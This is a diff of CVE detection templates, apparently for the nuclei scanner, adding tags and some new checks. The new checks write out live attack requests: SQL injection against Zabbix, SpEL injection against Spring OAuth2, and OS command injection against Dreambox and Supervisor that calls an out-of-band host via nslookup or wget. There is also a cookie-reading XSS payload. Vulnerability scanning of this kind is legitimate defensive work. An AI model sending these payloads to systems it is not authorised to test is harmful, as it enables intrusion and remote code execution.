tags: cve,cve2016,wordpress,xss,wp-plugin
tags: cve,cve2016,wordpress,xss,wp-plugin,mail
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

34
cves/2016/CVE-2016-10134.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2016-10134
info:
name: SQL injection vulnerability in zabbix "latest.php"
author: princechaddha
severity: critical
description: SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.
reference:
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
tags: cve,cve2016,zabbix,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2016-10134
cwe-id: CWE-89
requests:
- method: GET
path:
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error in query [INSERT INTO profiles (profileid, userid'
- 'You have an error in your SQL syntax'
condition: and
- type: status
status:
- 200

2
cves/2016/CVE-2016-10956.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
tags: cve,cve2016,wordpress,wp-plugin,lfi
tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

2
cves/2016/CVE-2016-2004.yaml
View File

@ -22,7 +22,7 @@ network:
host:
- "{{Hostname}}"
- "{{Hostname}}:5555"
- "{{Host}}:5555"
matchers:
- type: word

2
cves/2016/CVE-2016-4975.yaml
View File

@ -5,7 +5,7 @@ info:
author: melbadry9,nadino,xElkomy,sullo
severity: low
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
tags: crlf,generic,cves,cve2016
tags: crlf,generic,cves,cve2016,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1

32
cves/2016/CVE-2016-4977.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2016-4977
info:
name: Spring Security OAuth2 Remote Command Execution
author: princechaddha
severity: high
description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
reference:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2016-4977
cwe-id: CWE-19
requests:
- method: GET
path:
- "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Unsupported response types: [978015547]"
- type: status
status:
- 400

2
cves/2016/CVE-2016-6210.yaml
View File

@ -19,8 +19,8 @@ info:
network:
- host:
- "{{Host}}:22"
- "{{Hostname}}"
- "{{Host}}:22"
matchers:
- type: regex

2
cves/2016/CVE-2016-7552.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
tags: cve,cve2016,lfi
tags: cve,cve2016,lfi,auth,bypass
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

4
cves/2017/CVE-2017-0929.yaml
View File

@ -13,7 +13,7 @@ info:
cvss-score: 7.50
cve-id: CVE-2017-0929
cwe-id: CWE-918
tags: cve,cve2017,oast,ssrf,dnn
tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke
requests:
- method: GET
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 500
- 500

4
cves/2017/CVE-2017-1000170.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
reference: https://www.exploit-db.com/exploits/49693
description: jqueryFileTree 2.1.5 and older Directory Traversal
tags: cve,cve2017,wordpress,wp-plugin,lfi
tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -28,4 +28,4 @@ requests:
part: body
- type: status
status:
- 200
- 200

4
cves/2017/CVE-2017-1000486.yaml
View File

@ -10,7 +10,7 @@ info:
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce
tags: cve,cve2017,primetek,rce,injection
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -32,4 +32,4 @@ requests:
- type: word
words:
- 'Mogwailabs: CHECKCHECK'
part: header
part: header

19
cves/2017/CVE-2017-11610.yaml
View File

@ -10,7 +10,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
metadata:
shodan-query: 'http.title:"Supervisor Status"'
tags: cve,cve2017,rce,supervisor,oast
tags: cve,cve2017,rce,supervisor,oast,xmlrpc
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
@ -30,13 +30,26 @@ requests:
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>wget http://{{interactsh-url}}</string>
<string>nslookup {{interactsh-url}}</string>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
- type: word
part: header
words:
- "text/xml"
- type: word
part: body
words:
- "<methodResponse>"
- "<int>"
condition: and

2
cves/2017/CVE-2017-12635.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
reference: https://github.com/assalielmehdi/CVE-2017-12635
tags: cve,cve2017,couchdb
tags: cve,cve2017,couchdb,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

2
cves/2017/CVE-2017-12637.yaml
View File

@ -5,7 +5,7 @@ info:
author: apt-mirror
severity: high
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi
tags: cve,cve2017,sap,lfi,java,traversal
reference:
- https://www.cvedetails.com/cve/CVE-2017-12637/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637

43
cves/2017/CVE-2017-14135.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2017-14135
info:
name: Dreambox 2.0.0 RCE
author: alph4byt3
severity: critical
description: enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py in the webadmin plugin for opendreambox 2.0.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI
reference:
- https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
- https://www.exploit-db.com/exploits/42293
- https://nvd.nist.gov/vuln/detail/CVE-2017-14135
tags: cve,cve2017,dreambox,rce
metadata:
shodan-query: title:"Dreambox WebControl"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2017-14135
cwe-id: CWE-78
requests:
- raw:
- |
GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/bin/sh"
- "/usr/script"
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200

2
cves/2017/CVE-2017-14535.yaml
View File

@ -7,7 +7,7 @@ info:
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
tags: cve,cve2017,trixbox,rce,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80

28
cves/2017/CVE-2017-15287.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2017-15287
info:
name: Dreambox WebControl Reflected XSS
author: pikpikcu
severity: medium
tags: cve,cve2017,xss,dreambox
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-15287
cwe-id: CWE-79
description: "There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI."
reference:
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
requests:
- raw:
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'Unknown command: <script>alert(document.cookie)</script>'

2
cves/2017/CVE-2017-16877.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
tags: cve,cve2017,nextjs,lfi
tags: cve,cve2017,nextjs,lfi,traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

2
cves/2017/CVE-2017-17562.yaml
View File

@ -9,7 +9,7 @@ info:
- https://github.com/ivanitlearning/CVE-2017-17562
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
severity: high
tags: cve,cve2017,rce,embedthis,goahead,fuzz
tags: cve,cve2017,rce,goahead,fuzz
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10

5
cves/2017/CVE-2017-3881.yaml
View File

@ -22,8 +22,11 @@ network:
read: 1024
- data: "show priv"
read: 1024
host:
- "{{Hostname}}:23"
- "{{Hostname}}"
- "{{Host}}:23"
read-size: 1024
matchers:
- type: word

2
cves/2017/CVE-2017-5521.yaml
View File

@ -7,7 +7,7 @@ info:
reference:
- https://www.cvedetails.com/cve/CVE-2017-5521/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
tags: cve,cve2017,auth-bypass
tags: cve,cve2017,auth-bypass,netgear
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10

2
cves/2017/CVE-2017-7269.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
- https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
tags: cve,cve2017,rce
tags: cve,cve2017,rce,windows
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

2
cves/2017/CVE-2017-7921.yaml
View File

@ -7,7 +7,7 @@ info:
reference:
- http://www.hikvision.com/us/about_10805.html
- https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01
tags: cve,cve2017,auth-bypass
tags: cve,cve2017,auth-bypass,hikvision
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00

4
cves/2017/CVE-2017-9822.yaml
View File

@ -5,7 +5,7 @@ info:
author: milo2012
severity: high
description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE)
tags: cve,cve2017,dotnetnuke,bypass
tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization
reference: https://github.com/murataydemir/CVE-2017-9822
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
@ -33,4 +33,4 @@ requests:
- type: status
status:
- 404
- 404

2
cves/2018/CVE-2018-0296.yaml
View File

@ -4,7 +4,7 @@ info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: high
tags: cve,cve2018,cisco,lfi
tags: cve,cve2018,cisco,lfi,traversal
reference: https://github.com/yassineaboukir/CVE-2018-0296
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

2
cves/2018/CVE-2018-1000130.yaml
View File

@ -5,7 +5,7 @@ info:
author: milo2012
severity: high
description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
tags: cve,cve2018,jolokia,rce
tags: cve,cve2018,jolokia,rce,jndi,proxy
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10

2
cves/2018/CVE-2018-1000861.yaml
View File

@ -5,7 +5,7 @@ info:
author: dhiyaneshDK,pikpikcu
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
tags: cve,cve2018,jenkin,rce
tags: cve,cve2018,jenkin,rce,jenkins
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

2
cves/2018/CVE-2018-10141.yaml
View File

@ -32,4 +32,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2018/CVE-2018-10818.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oast
tags: cve,cve2018,lg-nas,rce,oast,injection
requests:
- raw:

2
cves/2018/CVE-2018-11759.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache,tomcat
tags: cve,cve2018,apache,tomcat,status
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

2
cves/2018/CVE-2018-11784.yaml
View File

@ -6,7 +6,7 @@ info:
description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.
reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E
severity: medium
tags: tomcat,redirect,cve,cve2018
tags: tomcat,redirect,cve,cve2018,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.30

2
cves/2018/CVE-2018-1271.yaml
View File

@ -5,7 +5,7 @@ info:
author: hetroublemakr
severity: medium
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
tags: cve,cve2018,spring,lfi
tags: cve,cve2018,spring,lfi,traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.90

2
cves/2018/CVE-2018-1273.yaml
View File

@ -12,7 +12,7 @@ info:
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce
tags: cve,cve2018,vmware,rce,spring
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

2
cves/2018/CVE-2018-12998.yaml
View File

@ -9,7 +9,7 @@ info:
- https://github.com/unh3x/just4cve/issues/10
- http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-12998
tags: cve,cve2018,zoho,xss
tags: cve,cve2018,zoho,xss,manageengine
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

2
cves/2018/CVE-2018-13380.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss
tags: cve,cve2018,fortios,xss,fortinet
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

2
cves/2018/CVE-2018-15138.yaml
View File

@ -12,7 +12,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-15138
cwe-id: CWE-22
tags: cve,cve2018,ericsson,lfi
tags: cve,cve2018,ericsson,lfi,traversal
requests:
- method: GET

4
cves/2018/CVE-2018-15473.yaml
View File

@ -6,17 +6,17 @@ info:
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: network,openssh,cve,cve2018
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2018-15473
cwe-id: CWE-362
tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
- "{{Host}}:22"
matchers:
- type: regex

2
cves/2018/CVE-2018-16299.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cve,lfi
tags: wordpress,cve2018,cve,lfi,plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

4
cves/2018/CVE-2018-16341.yaml
View File

@ -5,7 +5,7 @@ info:
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
tags: cve,cve2018,nuxeo,ssti,rce
tags: cve,cve2018,nuxeo,ssti,rce,bypass
requests:
- method: GET
@ -15,4 +15,4 @@ requests:
- type: word
words:
- "31333333337"
part: body
part: body

Some files were not shown because too many files have changed in this diff Show More